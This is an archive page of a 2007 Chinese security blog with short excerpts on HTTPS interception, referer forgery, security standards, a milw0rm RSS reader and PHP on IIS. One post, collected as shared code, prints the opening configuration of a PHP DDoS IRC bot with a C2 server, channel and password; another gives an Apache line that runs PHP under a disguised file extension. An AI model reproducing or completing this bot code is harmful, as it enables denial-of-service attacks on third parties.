浏览模式: 标准 | 列表 2007年10月的文章

https中间人攻击

Posted by amxku on 2007-10-30, 9:13 PM

最近在看这东东，因为一个项目有这个相关的东西，也算是学习一下吧

https 中间人攻击

http://www.icylife.net/yunshu/show.php?id=468

Tags: 渗透, 技术, 入侵, https, 中间人

技术 | 评论: 2 | 阅读: 2702

北京奥运会的....

Posted by amxku on 2007-10-28, 8:40 PM

北京奥运会的....，假的。呼呼

Tags: 被黑站点, 北京, 奥运会

其它 | 评论: 3 | 阅读: 2463

轮回的牛X BLOG

Posted by amxku on 2007-10-27, 8:32 AM

AddType application/x-httpd-php .fbi

哈哈，这样就牛X了，呼呼

Tags: blog, 乱七八糟, apache

其它 | 评论: 2 | 阅读: 2626

技术只有满足需求才有价值

Posted by amxku on 2007-10-25, 6:39 PM

李彦宏对应届毕业的大学生发出忠告：技术只有满足需求才有价值。正因为缺少实现技术价值的空间，大学中学业成绩最好的同学有可能并不在日后的工作中取得更大的成就。
日前，百度董事长兼首席执行官李彦宏在南京大学面对近千名大学生发表演讲，并邀请“对互联网感兴趣的顶尖毕业生到百度工作，应届生最高年薪可达30万元”。他同时表示，在百度，毕业生能够获得超出从任何一个其他跨国公司所能获得的成长和回报。

» 阅读全文

Tags: 技术, 乱七八糟

其它 | 评论: 2 | 阅读: 2451

对国内目前信息安全专家与标准的理解

Posted by amxku on 2007-10-22, 8:21 PM

juan_5515 北京

反思一下当前的安全标准热：
因为中国的信息安全发展目前相对落后，缺乏标准和理论体系，所以大家都把眼光投到国外，于是从Rainbows 到CC,从bs7799到iso13335 ，SSE -CMM,IATF从NIST到GAO,NSA,到ITSM,ITIL,BS15000,以及英国的，加拿大的，澳大利亚的 ...,一时间大家纷纷大谈标准，以及各种基于标准的认证，尤其是在安全服务领域，有一部分人还对各种国外标准盲目迷信和崇拜，似乎不谈标准就什么也干不成，不谈标准就不够专业，纷纷找来五花八门的东西，一方面还得借助英汉词典读着这些艰深晦涩的东西。

» 阅读全文

Tags: 信息安全, 工作, 安全标准, bs7799, iso13335

技术 | 评论: 7 | 阅读: 3166

伪造HTTP-REFERER方法及防止伪造REFERER方法探讨

Posted by amxku on 2007-10-22, 5:48 PM

HTTP-REFERER这个变量已经越来越不可靠了，完全就是可以伪造出来的东东。

原理都是sock构造http头来senddata。其他语言什么的比如perl也可以,

目前比较简单的防御伪造referer的方法是用验证码（Session）。

现在有一些能防盗链软件的商业公司比如UUDOG，linkgate，VirtualWall什么的，都是开发的应用于IIS上面的dll。
有的是采用cookies验证、线程控制，有的是能随机生成文件名然后做URL重写。有的方法能的确达到不错的效果.

不过道高一尺，魔高一丈，这些雕虫小技终归是有破解方法的。

» 阅读全文

Tags: asp, php, 脚本渗透, 漏洞

技术 | 评论: 1 | 阅读: 2361

PHP DDoS Bot

Posted by amxku on 2007-10-20, 10:58 PM


<?php
/*
php ddos bot
Version 1.0
*/
$server="1.3.3.7";
$Port="6667";
$nick="bot-";$willekeurig;
$willekeurig=mt_rand(0,3);
$nicknummer=mt_rand(100000,999999);
$Channel="#WauShare";
$Channelpass="ddos";

» 阅读全文

Tags: php, ddos, bot, 代码收藏

技术 | 评论: 3 | 阅读: 2947

simple miw0rm rss news graber

Posted by amxku on 2007-10-20, 10:53 PM


#!/usr/bin/perl

use LWP::Simple;

use XML::Simple;

use Term::ANSIColor;

$content = get('http://milw0rm.com/rss.php');

$xml = XMLin($content);

$num = scalar(@{$xml->{channel}->{item}});

for ($i=0; $i<$num; $i++){

print

colored("\nDate: $xml->{channel}->{item}->[$i]->{pubDate}\n", 'yellow'),

colored("\nTitle: $xml->{channel}->{item}->[$i]->{title}\n", 'green'),

colored("\nLink: $xml->{channel}->{item}->[$i]->{link}\n\n\n", 'green');

};

Tags: perl, 代码收藏

技术 | 评论: 0 | 阅读: 1662

关于渗透测试自动化的可行性

Posted by amxku on 2007-10-19, 11:02 PM

渗透测试自动化工具, http://hi.baidu.com/darkne2s/blog/item/deb6921bbee9061b8718bf04.html ,好像还真有人在做这一块的努力哦。

其实好像很多人都想做，只是没有胆量和精力来完成这个事情。为这位仁兄加油吧

Tags: 渗透, 工具

其它 | 评论: 5 | 阅读: 2519

MicroSoft的FastCGI模块提高PHP的性能

Posted by amxku on 2007-10-19, 10:56 PM

microsoft开始大力支持php了，zend公司和微软公司改善了微软的IIS Web服务器的fastcgi模块，它将提高PHP的性能。这个模块免费提供给IIS6和IIS7的用户，可以运行在Windows Server 2003上，并将作为vista和即将推出的Windows Server 2008的一部分。

近日，微软和PHP社区经过一年的努力，通过fastcgi扩展，终于能让PHP在IIS 7.0上执行效率大增。而此前，PHP曾经是IIS心口上的稳痛，PHP在IIS的扩展速度一直跟不上其他服务端。而免费的fastcgi扩展的出现，使得PHP一越成为Windows平台之上的“一等公民”。

更详细的信息在这里：http://www.phpq.net/viewnews-15.html

Tags: php, microsoft, fastcgi, zend

共享 | 评论: 0 | 阅读: 1781

Records:1712 ›